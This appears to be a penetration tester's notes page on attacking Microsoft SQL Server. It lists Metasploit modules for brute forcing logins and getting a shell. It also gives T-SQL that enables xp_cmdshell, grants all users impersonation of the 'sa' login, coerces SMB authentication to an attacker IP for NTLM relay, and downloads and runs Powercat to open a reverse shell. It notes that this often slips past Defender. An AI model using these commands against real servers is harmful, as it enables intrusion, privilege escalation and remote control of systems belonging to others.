Useful Metasploit modules

Metasploit MS SQL modules

Metasploit provides a lot of tools for enumerating and exploiting MS SQL.

  • auxiliary/scanner/mssql/mssql_ping — Discover MS SQL servers (alternatively, use --script=ms-sql-info with Nmap)
  • auxiliary/scanner/mssql/mssql_login — Brute force logins
  • auxiliary/admin/mssql/mssql_enum — Enumerate databases
  • exploit/windows/mssql/mssql_payload — Get a shell
Link to original

xp_cmdshell

MS SQL includes the xp_cmdshell “extended” procedure, which allows a shell command to be called. This is disabled by default, but if enabled it can be used in a trigger to provide persistence on database activity. Powercat, a re-implementation of netcat in pure PowerShell, is useful here.

-- Enable MS SQL "advanced options"
--
sp_configure 'Show Advanced Options',1;
RECONFIGURE;
 
-- Enable xp_cmdshell stored procedure
--
sp_configure 'xp_cmdshell',1;
RECONFIGURE;
 
--- OPTIONAL: Allow all users to impersonate the "sa" (database
--- administrator) user (this enables low-privilege website users
--- to run xp_cmdshell)
---
USE master;
GRANT impersonate ON login::sa TO [public];
 
-- Coerce MS SQL to connecting using SMB to an attacker at
-- 1.2.3.4. Useful for NTLM relay attacks (if SMB signing isn't
-- turned on, that is).
--
EXEC master.sys.xp_dirtree '\\1.2.3.4\share',1,1;
 
-- Download an execute Powercat from an attacker at 1.2.3.4
-- (using the built-in Python web server) and connect back to
-- that IP on port 1337. Note that this in general should be
-- caught by IDS/IDP systems, including Defender... But I've
-- actually had it work for me out-of-the-box a surprising
-- number of times.
--
EXEC master.sys.xp_cmdshell 'powershell.exe -c "IEX(New-Object System.Net.WebClient).DownloadString(''http://1.2.3.4:8000/powercat.ps1''); powercat -c 1.2.3.4 -p 1337 -e cmd.exe"'